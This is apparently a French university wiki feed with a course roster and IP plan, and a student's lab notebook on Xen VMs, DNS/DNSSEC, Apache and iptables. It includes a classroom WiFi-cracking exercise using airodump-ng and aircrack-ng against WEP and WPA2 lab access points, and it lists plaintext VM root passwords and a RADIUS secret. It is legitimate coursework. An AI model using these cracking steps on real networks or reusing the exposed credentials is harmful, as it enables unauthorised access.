https://wiki-se.plil.fr/mediawiki/api.php?action=feedcontributions&feedformat=atom&user=Cpayet
wiki-se.plil.fr - Contributions [fr]
2026-05-14T05:01:20Z
Contributions
MediaWiki 1.39.1
https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&diff=12737
SE4 IdO sécurité système/réseau 2025/2026
2026-03-03T10:43:06Z
<p>Cpayet : /* Répartition des binômes pour les travaux pratiques "administration système et réseau" */</p>
<hr />
<div>= Répartition des binômes pour les travaux pratiques "administration système et réseau" =<br />
<br />
Préfixe des noms de machine : <code>SE4</code>.<br />
<br />
Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elève !! Nom de domaine<br />
! Nom de machine de services !! Nom de machine mandataire<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.tech|| SE4.Elf||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || dardevil.tech|| SE4.catwoman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice<br />
|}<br />
<br />
{| class="wikitable"<br />
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves <br />
!numéro de binôme<br />
!Adresse IPV4 OpenWRT<br />
|-<br />
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE<br />
|1<br />
|<br />
|-<br />
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST<br />
|<br />
|<br />
|-<br />
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE<br />
|3<br />
|193.48.57.180<br />
|-<br />
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI <br />
|4<br />
|<br />
|-<br />
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN<br />
|5<br />
|<br />
|-<br />
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki<br />
|7<br />
|<br />
|-<br />
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.<br />
|6<br />
|<br />
|-<br />
| SE4.Solstice|| 193.48.57.167|| Mohamed Salhi <br />
|2<br />
|<br />
|-<br />
|}<br />
<br />
= Tableau des commutateurs virtuels =<br />
<br />
{| class="wikitable"<br />
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé <br />
|-<br />
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24<br />
|-<br />
|PAYET / DELOBELLE<br />
|pont_pacman<br />
|192.168.10.0/24<br />
|-<br />
|MERIEN / VANGHELUWE<br />
|pont_pere<br />
|192.168.0.0/24<br />
|-<br />
|CHEKLAT / BIERNACKI<br />
|pont_ironman<br />
|192.168.69.0/24<br />
|-<br />
|SALHI<br />
|pont_msalhi<br />
|192.168.20.0/24<br />
|-<br />
|GOURVEST/GHAZALI<br />
|pont_diviseur<br />
|192.168.67.0/24<br />
|-<br />
|YAHIANI / TEPELI<br />
|pontclio<br />
|192.168.7.0/24<br />
|-<br />
|GAUTHIER / SOUOP METSE<br />
|Styx<br />
|192.168.50.0/24<br />
|}<br />
<br />
= Tableau des réseaux virtuels =<br />
<br />
VLAN privés :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| VLAN1 || 1<br />
|-<br />
| MV-PROMO || 2 <br />
|-<br />
|E1-Pierre<br />
|11<br />
|-<br />
|E2-Agathe<br />
|12<br />
|-<br />
|E5-Cedric<br />
|15<br />
|-<br />
|E6-Thomas<br />
|16<br />
|-<br />
|E9-Aurele<br />
|19<br />
|-<br />
|E10-Tom<br />
|20<br />
|-<br />
|E13-Billel<br />
|23<br />
|-<br />
|E14-Antonin<br />
|24<br />
|-<br />
|E15-MSalhi<br />
|25<br />
|-<br />
|E11-Evora<br />
|28<br />
|-<br />
|E12-Gauthier<br />
|21<br />
|-<br />
|E8-Yassine<br />
|18<br />
|-<br />
|E7-Ibrahim<br />
|17<br />
|}<br />
<br />
VLAN communs avec l'école :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| INTERCO1 || 530 <br />
|-<br />
|}<br />
<br />
= Schéma de câblage =<br />
<br />
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.<br />
<br />
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.<br />
<br />
= Plan d'adressage =<br />
<br />
{| class="wikitable"<br />
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 <br />
|-<br />
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code><br />
|-<br />
| PoolPierre || <code>10.60.1.0/24</code> || </code>2001:660:4401:60a1::/64</code><br />
|-<br />
| PoolAgathe || <code>10.60.2.0/24</code> || </code>2001:660:4401:60a2::/64</code><br />
|-<br />
|PoolCedric<br />
|<code>10.60.5.0/24</code><br />
|2001:660:4401:60a5::/64<br />
|-<br />
|PoolThomas<br />
|<code>10.60.6.0/24</code><br />
|2001:660:4401:60a6::/64<br />
|-<br />
|PoolBillel<br />
|<code>10.60.13.0/24</code><br />
|2001:660:4401:60ad::/64<br />
|-<br />
|PoolAurele<br />
|<code>10.60.9.0/24</code><br />
|2001:660:4401:60a9::/64<br />
|-<br />
|PoolTom<br />
|<code>10.60.10.0/24</code><br />
|2001:660:4401:60aa::/64<br />
|-<br />
|PoolSalhi<br />
|<code>10.60.15.0/24</code><br />
|2001:660:4401:60b1::/64<br />
|-<br />
|PoolAntonin<br />
|<code>10.60.14.0/24</code><br />
|2001:660:4401:60ae::/64<br />
|-<br />
|PoolYassine<br />
|10.60.8.0/24<br />
|2001:660:4401:60a8::/64<br />
|-<br />
|PoolEvora<br />
|10.60.11.0/24<br />
|2001:660:4401:60ab::/64<br />
|}<br />
<br />
Adresses IPv4 des éléments réseau dans VLAN1<br />
<br />
{| class="wikitable"<br />
! Elément !! Adresse <br />
|-<br />
| Routeur C9200-E304 || 172.27.0.1/16<br />
|-<br />
| Routeur C9200-E306 || 172.27.0.2/16<br />
|-<br />
| Borne Wi-Fi E306 || 172.27.0.3/16<br />
|-<br />
| Borne Wi-Fi E304 || 172.27.0.4/16<br />
|}<br />
<br />
= Informations VRRP =<br />
<br />
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.<br />
<br />
== VLAN des machines virtuelles ==<br />
<br />
Une seule instance VRRP dans le VLAN des machines virtuelles.<br />
<br />
Adresse IPv4 virtuelle : <code>193.48.57.162</code><br />
<br />
{| class="wikitable"<br />
! Routeur !! IPv4 propre <br />
|-<br />
| C9200 E304 || <code>193.48.57.163</code><br />
|- <br />
| C9200 E306 || <code>193.48.57.164</code><br />
|-<br />
|}<br />
<br />
== VLAN ... ==</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12221
Atelier SysRes SE4 2025/2026 E5
2026-02-10T17:09:18Z
<p>Cpayet : /* Utiles */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
<br />
Et enfin on attend (c'est long si vous vous demander... tres looong faite la suite en attendant :<syntaxhighlight lang="bash"><br />
Aircrack-ng 1.7 <br />
<br />
[00:35:36] 66631280/100000000 keys tested (30842.35 k/s) <br />
<br />
Time left: 18 minutes, 1 second 66.63%<br />
<br />
KEY FOUND! [ 66685666 ]<br />
<br />
<br />
Master Key : EF 69 DE 33 B4 7F AA 9E 20 AB 3C AF F1 F7 3E A8 <br />
61 7C 80 F2 3C A9 FE B6 9A 72 98 B3 20 B3 2A A6 <br />
<br />
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
<br />
EAPOL HMAC : AD 95 F2 4D 5A 3F 4A 57 CD D8 0E EA A6 14 8B 1A <br />
<br />
<br />
</syntaxhighlight><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
